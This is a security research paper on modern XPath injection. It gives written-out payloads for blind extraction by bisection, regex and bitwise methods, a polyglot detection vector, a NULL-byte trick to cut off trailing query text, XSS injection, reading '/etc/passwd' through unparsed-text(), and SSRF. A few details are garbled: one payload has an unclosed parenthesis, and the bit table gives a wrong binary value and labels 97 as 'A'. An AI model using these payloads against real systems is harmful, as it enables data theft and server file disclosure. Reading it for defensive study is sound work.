=======================================
	Modern XPath Exploitation
=======================================

Ruben Ventura Piña
http://nzt-48.org
@tr3w_
07-20-2023

Abstract
========

Now that XML documents are being widely used in modern web applications, XPath injections
are becoming more important.

With the introduction of XPath 2.0 and XPath 3.1, many new functionalities have been
added to XPath. This new functions allow attackers to perform more sophisticated and
powerful attacks compared to all other currently public exploitation techniques. 

At the time this document was written, all XPath exploitation tools extract information
through very limited  techniques such as brute-force. 

The purpose of this paper is to optimize the information extraction process as much as
possible and to leverage more lethal attacks such as remote file disclosure, XSS,
turning blind injections into visible injections and remote code execution.

An exploitation tool has been written as a proof of concept.

Bisection method
----------------

Instead of doing a brute-force attack, it is possible to use a binary search to make
the data extraction process much faster.

Before XPath 2, the binary search was performed using the contains() function. This means
that the full character set needs to be sent to the server. When dealing with non-latin
alphabets such as japanese and others this task becomes very tedious.

The new function 'string-to-codepoints' converses any character into its numeric unicode
representation. The new operators "less than (<)" and "greater than (>)" can be combined
with 'string-to-codepoints' to perform a binary search algorithm to find the characters
faster:

	1' and string-to-codepoints(substring(password/text())) >= %d and
	string-to-codepoints(substring(password/text())) < %d and '1

xcat is the only tool out there that uses this technique, a more advanced and optimized
technique has been designed (see the bitwise section).


Regexp method
-------------

New functions for performing regular expressions were also added to the language. It is
possible to use these functions as another way to implement the bisection method:

	1' and matches(substring(password/text(), 1, 1), "[A-Z]" and '1

Request after request, the character ranges will be split in half to narrow down the values
of the character being extracted.


Bitwise methods
---------------

In 2010, binary based methods were invented to extract information through SQL injection
in an extremely optimized fashion. This methods extract characters in their numeric binary
representation bit per bit. If the page responds with a TRUE response, it means that the bit
in question is a 1. In any other case, the bit being extracted is equal to 0.

The advantage of this method is that every request is independent from the others, in
contrast to the bisection method in which each request must be performed one after the other
in a sequential order. Thus, we can perform all the requests at once with threads which
means that the desired character is going to be obtained around 7 times faster than the
bisection method because all the bits can be requested at the same time. The injection looks like the follwing:

	1'and(floor(string-to-codepoints(substring(password/text(),1,1))div %d)mod 2)and'1

Since XPath doesn't implement any bitwise functions yet, each individual bit can be
calculated and requested by performing a division over powers of 2 (0x01, 0x02, 0x04, 0x08,
0x10, 0x20, 0x40) and then by calculating its module by 2:


	(97 / 0x01 % 0x02)	= 1	TRUE
	(97 / 0x02 % 0x02)	= 0	FALSE
	(97 / 0x04 % 0x02)	= 0	FALSE
	(97 / 0x08 % 0x02)	= 0	FALSE
	(97 / 0x10 % 0x02)	= 0	FALSE
	(97 / 0x20 % 0x02)	= 1	TRUE
	(97 / 0x40 % 0x02)	= 1	TRUE
	(97 / 0x80 % 0x02)	= 0	FALSE
	
	010000110 = 97 = 'A'


Detection phase optmization:
============================

Blind XPath injections can happen in single quoted strings, double quoted strings and
numeric contexts.

Usually, 3 injections must be made to find out what is the context of the vulnerable
parameter.

	and '1'='1
	and "1"="1
	and 1

This can be improved by using just one injection with a polyglot vector that works in every
possible scenario. Instead of making 3 requests, just 1 is done, accelerating the process
so it is 66% faster.

	and 1 (: ' and " and '"!='!=":)

Comments in XPath need to be opened and closed with the (: :) delimiters.


Turn XPath injections into Cross-Site Scripting
========================================================

Instead of returning nodes with XPath, it is also possible to return specific strings
defined by the user:

	//root/"this text will be printed"


Even though with XPath it is possible to change the query by injecting more code, most of
the time this is not possible because there is always trailing text after the injected
value:

	//users/username[username/text()='admin']/"print this text" ']/password
								    -----------Invalid code

As you can see, the only way to inject arbitrary text and make it display
would be to break the encapsulation by closing the quote and the bracket and
modify the entire query at will. However, the fact that there is trailing text after
the injection is a problem because this would yield invalid code or would augment the
complexity of the injection.

In contrast to SQL, there are no single line comments such as -- and # to ignore
the trailing text.

However, I found an undocumented feature in XPath which is useful for commenting out
trailing text. I made use of a NULL byte after the injection. This terminates the string
and all the ending trails will be ignored; the attacker controls the output as a result:

	//users/username[username/text()='admin']/"<script>alert()</script>"%00']/password

That line would use XPath to leverage a XSS attack.


Implementation-dependent comments regarding the NULL byte string terminator
---------------------------------------------------------------------------

As this NULL byte functionality doesn't appear in the XPath specifications, it is very
likely that it might work only in certain XPath implementations.

I tested it in the Saxon implementation by Saxonica (http://saxonica.com) but I really
do not have the chance to test it in other implementations.

It might be interesting to find out if the NULL byte terminator works in all XPath
implementations. If someone wants to b contribute by testing the NULL byte in other
implementations the help would be highly appreciated.

List of other XPath Implementations:
https://en.wikipedia.org/wiki/XPath#Implementations


Turning blind injections into visible injections:
=================================================

Since there is trailing text after the injection point, the only possible way to
extract other nodes than the ones intended to be displayed was through blind boolean
injections.

After seeing how the NULL byte trick works, it is only logical to conclude that the
entire query can be changed and any desired node can be displayed by escaping from
the conditional braces and add other selectors at the end along with a NULL byte
to ignore the original query and replace it with whatever statement the attacker
desires to execute:

	//username[username/text()='admin']/CreditCartNumber/text()%00']/original-query


Arbitrary file disclosure
=========================

XPath can also be exploited to disclose the contents of arbitrary files in the server.
This is achieved with the new unparsed-text() function. The blind injection can be turned
into a visible one by using the NULL byte trick in order to modify the query and ignore the
original. Thus, the contents of the target file will be completely revealed in one response.

	//user[user/text()='break']/unparsed-text('/etc/passwd')%00']/trailing-characters

The unparsed-text() function will literally open the file and show all of its contents.

Sometimes (depending on the software implementation of XPath) the static-base-uri() returns
an empty string which means that instead of using relative URIs, absolute paths should be
used which can be an obstacle. The function base-uri() can be used to print the location
of the static resource.

	//user[user/text()='break']/base-uri()%00']

The document-uri() function can also be used for this.

If it is not possible to make the blind injection visible (with the NULL byte trick), the
content of the files in the server can be extracted character by character through the
bitwise extraction methods.

It is worth commenting that at the time this was written, xcat (being the more popular tool)
recently was updated to include this functionality. However, I tested it and this module
has a lot of bugs and doesn't work most of the time (at least in my computer).


Server-Side Request Forgery
===========================

It is also possible to force XPath to perform requests to any server by making a HTTP
request through the doc(), doc-available(), unparsed-text() or unparsed-text-available()
functions. The server makes the request and it will be excuted on its behalf.

Proof-Of-Concept
================
An XPath exploitation tool which implements the bitwise bit-anding method has been written.
http://nzt-48.org/tools/


Appendix
========

You can find the XPath specifications here:
https://www.w3.org/TR/xpath-functions-31/


Links to other XPath injection tools (most of them are very old):

xcat
https://github.com/orf/xcat

xxxpwn
https://github.com/feakk/xxxpwn

xpath-blind-explorer
https://github.com/micsoftvn/xpath-blind-explorer

XMLCHOR
https://github.com/Harshal35/XMLCHOR/